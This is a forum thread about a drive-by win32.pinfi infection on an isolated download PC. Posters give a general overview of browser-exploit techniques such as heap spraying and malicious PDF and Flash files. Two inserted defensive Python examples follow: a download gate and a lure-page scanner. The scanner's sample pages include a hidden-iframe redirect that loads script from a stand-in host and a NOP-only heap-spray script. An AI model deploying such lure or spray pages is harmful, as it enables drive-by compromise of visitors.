win32.pinfi - Page 2


Re: win32.pinfi



"Leythos" wrote:


Can you provide a google link or similar to that article?

I'd be interested to know how a person like yourself, who no doubt has
systems fully patched, has a properly configured firewall, does not
surf the web with administrator rights and does not run executable
content offered could be affected.

Was this a zero-day exploit of some kind?



Re: win32.pinfi

Ant wrote:

Well put, as a rhetorical expose of the disingenuous claims of such a seasoned
cyber citizen, shows the reason some wankers rightly think they need real time
protection.

Re: win32.pinfi



not@home.today says...

Do a google groups search - I posted it to Usenet in several security
groups.

The computer in question was set up for the sole purpose of downloading
files from the web, the account was a local admin, the firewall
permitted all file types to be accessed in HTTP/FTP, but it was isolated
from the rest of the network.

The computer was fully patched, running XP Prof SP3 and all updates,
SEPP latest version and fully updated, and I was using the latest
FireFox browser at the time.

If I had blocked exe/com/dll/etc. it would not have happened, same if
the machine was not set up as a local admin (like the rest of our
computers).

We set this machine up with the idea that IT WOULD be compromised at
some point, that's why it was isolated, but in years (not the same
physical computer) it never happened.

The interesting thing is that I've seen several other computers,
residential systems, compromised with what appears to be the same crap.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)
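An added example, not code from this thread or from any poster: a download gate of the kind Leythos says would have stopped this. It blocks the executable types he names by extension and, going one step further than the post, also by PE magic bytes, so an executable served under a harmless name or MIME type is still refused. The extension and MIME lists, the function names and every sample request are assumptions constructed for this example.

```python
"""Download gate for an isolated download box (added example, not from the thread).

Implements the rule Leythos says would have prevented the infection (block
exe/com/dll/etc.) and adds a PE magic-byte check so an executable served
under a harmless name or MIME type is still refused. The lists, names and
sample requests below are assumptions made for this example.
"""
from dataclasses import dataclass
from urllib.parse import urlparse

# Extensions the poster named, plus a few others Windows executes directly.
BLOCKED_EXTENSIONS = {"exe", "com", "dll", "scr", "pif", "cpl",
                      "msi", "bat", "cmd", "vbs", "js", "hta"}
# MIME types a browser hands to the OS loader instead of rendering.
BLOCKED_MIME = {"application/x-msdownload", "application/x-msdos-program",
                "application/vnd.microsoft.portable-executable"}


@dataclass
class Decision:
    allow: bool
    reason: str


def looks_like_pe(prefix: bytes) -> bool:
    """True if the buffered body prefix carries a Windows PE image.

    A PE file starts with the DOS stub signature 'MZ'; the 32-bit offset at
    0x3C (e_lfanew) points at the 'PE\\0\\0' signature. Checking both keeps a
    text file that merely begins with the letters MZ from being flagged.
    The caller is assumed to buffer a few KiB so e_lfanew falls inside it.
    """
    if len(prefix) < 0x40 or prefix[:2] != b"MZ":
        return False
    pe_offset = int.from_bytes(prefix[0x3C:0x40], "little")
    if pe_offset + 4 > len(prefix):
        return False  # offset is garbage or beyond what we buffered
    return prefix[pe_offset:pe_offset + 4] == b"PE\0\0"


def _extension(path: str) -> str:
    base = path.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def classify_download(url: str, headers: dict, body_prefix: bytes) -> Decision:
    """Content checks run first so a renamed executable cannot hide behind
    a friendly name; name-based rules follow as a cheap second layer."""
    hdrs = {k.lower(): v for k, v in headers.items()}

    if looks_like_pe(body_prefix):
        return Decision(False, "pe_signature")

    mime = hdrs.get("content-type", "").split(";")[0].strip().lower()
    if mime in BLOCKED_MIME:
        return Decision(False, "mime:" + mime)

    ext = _extension(urlparse(url).path)
    if ext in BLOCKED_EXTENSIONS:
        return Decision(False, "extension:" + ext)

    # Content-Disposition may name a file that differs from the URL path.
    disp = hdrs.get("content-disposition", "").lower()
    if "filename=" in disp:
        fname = disp.split("filename=", 1)[1].strip().strip('"')
        if _extension(fname) in BLOCKED_EXTENSIONS:
            return Decision(False, "disposition:" + _extension(fname))

    return Decision(True, "ok")


# --- constructed samples, not real files ---
# Minimal PE-shaped prefix: 'MZ', e_lfanew = 0x40, 'PE\0\0' at offset 0x40.
SAMPLE_PE = (b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little")
             + b"PE\0\0" + b"\0" * 28)
# Plain text that happens to start with the letters MZ.
SAMPLE_TEXT = b"MZ is also just two letters in a text file. " * 3
SAMPLE_PDF = b"%PDF-1.4\n" + b"\0" * 64

SAMPLE_REQUESTS = [
    ("http://mirror.example.invalid/tools/setup.exe",
     {"Content-Type": "application/octet-stream"}, b""),
    ("http://mirror.example.invalid/docs/readme.txt",
     {"Content-Type": "text/plain"}, SAMPLE_TEXT),
    # renamed executable: friendly name and MIME type, PE bytes inside
    ("http://cdn.example.invalid/img/photo.jpg",
     {"Content-Type": "image/jpeg"}, SAMPLE_PE),
    ("http://mirror.example.invalid/docs/manual.pdf",
     {"Content-Type": "application/pdf"}, SAMPLE_PDF),
    ("http://mirror.example.invalid/get?id=7",
     {"Content-Type": "text/html",
      "Content-Disposition": 'attachment; filename="update.scr"'}, SAMPLE_TEXT),
]


def run_samples():
    """Classify every constructed request; returns (url, Decision) pairs."""
    return [(url, classify_download(url, h, body)) for url, h, body in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for url, d in run_samples():
        print(("ALLOW " if d.allow else "BLOCK ") + url + "  (" + d.reason + ")")
```

The ordering is the point: the extension rule alone is what the post describes, and the third sample shows why it is not enough on its own, since the same PE bytes arrive as photo.jpg with an image MIME type and only the magic-byte check refuses them.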

Re: win32.pinfi



"Leythos" wrote:


The article title or a group name would have helped, but someone
kindly sent me a link.

http://groups.google.com/group/microsoft.public.windowsxp.security_admin/msg/5a7d07766b150feb?hl=en


Ok. Nothing wrong with being able to download potentially dangerous
files but running them is another matter.


Seems like FireFox could be the problem.


Ok.

I've read the article and it appears the user did not deliberately
download and run something but simply visited a bad site causing
FireFox or one of its plugins to run an executable. Since the browser
was up-to-date and presumably configured properly, this indicates a
new or recently discovered but unpatched bug.

Typically, malicious sites attempt to run Javascript which does
several of the following:

* Allocate huge blocks of memory, filling with nop slides and
shellcode in preparation for exploiting a buggy browser component.
The exploit corrupts the process or thread stack and the CPU
instruction pointer ends up in the prepared memory. The attackers
code is now in control. I believe Data Execution Prevention (DEP) is
supposed to prevent this happening.

* Attempt to exploit many different ActiveX controls which are known
to be vulnerable or unsafe. They can be standard Microsoft components
or so-called browser helper objects like toolbars and search
assistants from other software vendors. Not usually an issue with
Mozilla browsers which don't understand ActiveX controls, although
I've heard of a plugin that can enable access to them.

* Load malformed PDF and SWF (Flash) documents which also contain
shellcode and exploits for buggy Adobe components. Sometimes these
are targeted at other document readers like FoxIt.

* Run Java applets which exploit buggy versions of Sun's JVM.

* Exploit other controls, components, plugins or DOM peculiarities
specific to FireFox or other browsers.

I think that just about covers the current range of possibilities for
browsers. Other than that, the user would have to deliberately run an
executable.


Bogus security/AV software is widespread.



Re: win32.pinfi



Ant wrote:

Didn't Foxit fix that vulnerability back last summer
with v3.0 b1817? http://tinyurl.com/yeseu8t

Re: win32.pinfi



"ASCII" wrote:


Yes, but people think that by using alternative software they are
immune from attack. Exploit writers are wise to this, so whatever
browser and associated applications are used as helpers to display
documents/multimedia, it's important to keep them up-to-date.



Re: win32.pinfi


| "ASCII" wrote:



| Yes, but people think that by using alternative software they are
| immune from attack. Exploit writers are wise to this, so whatever
| browser and associated applications are used as helpers to display
| documents/multimedia, it's important to keep them up-to-date.


Actually, there was another vendor-independent PDF vulnerability the US CERT
identified (APSB09-15) in October that was patched by FoxIt v3.1.2.xxxx

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



Re: win32.pinfi





Murphy sez:

Updating to the latest and greatest will add new and currently unknown
vulnerabilities.

Art :)

Re: win32.pinfi



"Art" wrote:


The more complex systems become, the more bugs they have and the more
opportunities there are for exploits. That's why my browser is wget on
Windows 2000! Well, not all the time but a lot of malware will now
only run on later versions of XP and above. Some of it requires recent
versions of the VC++ runtime libraries, newer API functions in the
core OS and some uses dot-NET. I don't have that stuff on my internet-
connected PC.

My system wouldn't suit a modern-day web user; it's too minimalist and
doesn't have the latest gizmos. Apps I use most are a command prompt
and a text editor!



Re: win32.pinfi



not@home.today says...

Yep, but as I mentioned, I didn't click on anything, it was a browser
redirect and nothing was downloaded/clicked.


Re: win32.pinfi



"Leythos" wrote:


However, executables were downloaded (or injected into memory) and
run, albeit automatically by the browser, thereby indicating a
problem with that software. At least, one presumes that was the case
and there wasn't some vulnerable MS service accepting malicious
requests on, say port 445 coincidentally at the same time.



Re: win32.pinfi



not@home.today says...

There is no port 445 access on that network, only FTP, HTTP, HTTPS, DNS
on that network.


Re: win32.pinfi



Leythos wrote:

...learned how to configure a safe web interface (browser) such that one could
surf without fear, regardless of the site.

Re: win32.pinfi




You seem to have missed the article like Butts did - it was a
sacrificial machine with the sole purpose of downloading files.


Re: win32.pinfi




It is well known that downloading program files from the web can
potentially lead to malware problems. What interests me more (and from a
detection point of view) is how the initial lure gets to be displayed to
a user. Obfuscated HTML and/or script (I'm sure scripting was also
enabled and unrestricted) can be detected as suspicious (Avira may show
a heuristic detection of these) and 'nipped in the bud'. This is
*not* the same as detecting the actual (various) malware being served
up. Does your goat log these lure attempts, and did the endpoint
protection slip up, or was it a new obfuscation technique it wasn't yet
equipped to handle? Are your downloads unattended, or is the user
required to say "yes" to whatever oddball rogue requests a click from
them?

I assume this was a goat network rather than a regular network that you
set up on "opposite day". :o)
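An added example, not code from this thread or from any poster, for the detection angle raised in the post above and for the exploit-delivery patterns Ant lists earlier (nop slides built in script, hidden iframes, decoded script injected into the page): a heuristic scanner that scores a captured page for the obfuscated lure rather than for the payload it goes on to serve. The rule names, weights, threshold and the three sample pages are constructed for this example; the spray-shaped sample contains only NOP-valued escapes and no payload.

```python
"""Heuristic lure-page scanner (added example, not from the thread).

Scores captured HTML for the obfuscation patterns that precede a browser
exploit, rather than for the payload itself: hidden iframes, decode-then-
execute chains, long %u-escaped literals and string-doubling loops of the
kind used to prepare a nop slide, and instant redirects. Rule names,
weights, threshold and the sample pages are constructed for this example.
"""
import re
from typing import Dict, List

# (rule name, weight, pattern). The two spray-shaped rules carry more
# weight because legitimate pages almost never contain them.
RULES = [
    ("hidden_iframe", 1, re.compile(
        r"""<iframe[^>]*(?:width\s*=\s*["']?0|height\s*=\s*["']?0"""
        r"""|display\s*:\s*none|visibility\s*:\s*hidden)""", re.I)),
    ("decode_then_exec", 1, re.compile(
        r"(?:eval|document\.write)\s*\(\s*(?:unescape|decodeURIComponent|atob)\s*\(", re.I)),
    ("fromcharcode_chain", 1, re.compile(
        r"String\.fromCharCode\s*\((?:\s*\d+\s*,){16,}", re.I)),
    ("unicode_escape_run", 2, re.compile(r"(?:%u[0-9a-f]{4}){8,}", re.I)),
    ("string_growth_loop", 2, re.compile(
        r"while\s*\(\s*\w+\.length\s*<[^)]*\)\s*\{?\s*\w+\s*\+=\s*\w+", re.I)),
    ("instant_redirect", 1, re.compile(
        r"""<meta[^>]*http-equiv\s*=\s*["']?refresh[^>]*content\s*=\s*["']?0"""
        r"""|window\.location\s*=\s*["']https?://""", re.I)),
]
SUSPICIOUS_THRESHOLD = 2  # assumption: two weak signals, or one strong one


def scan_page(html: str) -> Dict[str, object]:
    """Return the score, the matched rule names and a verdict for one page."""
    reasons: List[str] = [name for name, _, pat in RULES if pat.search(html)]
    score = sum(w for name, w, _ in RULES if name in reasons)
    verdict = "suspicious" if score >= SUSPICIOUS_THRESHOLD else "clean"
    return {"score": score, "reasons": reasons, "verdict": verdict}


# --- constructed sample pages ---
BENIGN_PAGE = """<html><head><title>Product page</title>
<script>function show(id){document.getElementById(id).style.display='block';}</script>
</head><body><iframe src="/ads.html" width="300" height="250"></iframe>
<a href="/download/setup.exe">Download</a></body></html>"""

# Typosquat landing page: hidden iframe, decoded script tag, instant refresh.
LURE_PAGE = """<html><body>
<iframe src="http://redirector.invalid/in.cgi" width="1" height="0" style="display:none"></iframe>
<script>document.write(unescape("%3Cscript%20src%3D%22http%3A//stage2.invalid/x.js%22%3E%3C/script%3E"));</script>
<meta http-equiv="refresh" content="0;url=http://stage2.invalid/">
</body></html>"""

# Spray-shaped script: only NOP-valued escapes (%u9090) and no payload,
# which is enough for the detector and nothing more.
SPRAY_PAGE = """<html><body><script>
var slide = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
var block = slide;
while (block.length < 0x40000) block += block;
var heap = new Array();
for (var i = 0; i < 200; i++) heap[i] = block;
</script></body></html>"""

SAMPLE_PAGES = {"benign": BENIGN_PAGE, "lure": LURE_PAGE, "spray": SPRAY_PAGE}


def scan_all() -> Dict[str, Dict[str, object]]:
    """Scan every constructed sample page; returns name -> scan result."""
    return {name: scan_page(html) for name, html in SAMPLE_PAGES.items()}


if __name__ == "__main__":
    for name, result in scan_all().items():
        print(f"{name:7s} {result['verdict']:10s} score={result['score']} {result['reasons']}")
```

This is deliberately a pre-payload check: the benign page links to setup.exe and still scores zero, because the scanner cares about how the page tries to get code running, not about what it offers for download. Scoring several weak signals together rather than alerting on any one of them is what keeps a single zero-size advertising iframe from paging anyone.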



Re: win32.pinfi



erratic@nomail.afraid.org says...

We have one machine we set up to download from the net, it's a machine
that has no access to our other machines by network connection and
firewall rules - the purpose is to download files, it's not a honeypot,
it's just a safe way of doing downloads.

In this case I was attempting to browse to a MS site and entered the
address incorrectly and was taken to a non-MS site and immediately
redirected to the malicious site.

SEPP didn't show anything at the time of entry or during the additional
items the malware downloaded, and the firewall was not set up to monitor
intrusions on that network/machine.

In this case there was no manual anything, as soon as the page started
to load the tattle-tale DOS box appeared and then closed, doing this
several times in a few seconds - as each new malware was loaded.

The reason I posted the events/information was to make people aware of
just how easy, even if you're using a NAT router, it is to get
compromised by accident, using all updates/patches, using commercial
antimalware tools, etc.... In all my years I've never had that happen,
but we don't normally allow that level of access on our networks or
customers networks - this machine was isolated and for good reason.

The point was that with a few simple protection methods, based on how I
believe the infection entered, it could have been prevented, something
that most people are not willing to do because of the limits it puts on
them while using their computers.


Re: win32.pinfi




Common typo squatters!


Browser exploit webpage must have had something that worked on your
setup.


Why do you run this special isolated machine as admin?


Compartmentalization is the essence of what the term "firewall" used to
be all about.


You mean - like not running as admin when you don't need to?



Re: win32.pinfi



erratic@nomail.afraid.org says...

Because it's used for specific functions and the machine is set up for
access to sites that MIGHT compromise it.

You guys seem to miss that this is a sacrificial machine, just for
downloads on the net.


Re: win32.pinfi





No, I got that part.

What you seem to miss is that offering up your sacrifice of computing
power to possible nefarious activities affects us and not just you.



Re: win32.pinfi



erratic@nomail.afraid.org says...

Then you did miss the information in the description - there was NO
OFFERING and it WASN'T ONLINE FOR MORE THAN 10 SECONDS once compromised.

Sheesh, are you trying to be confrontational or what?

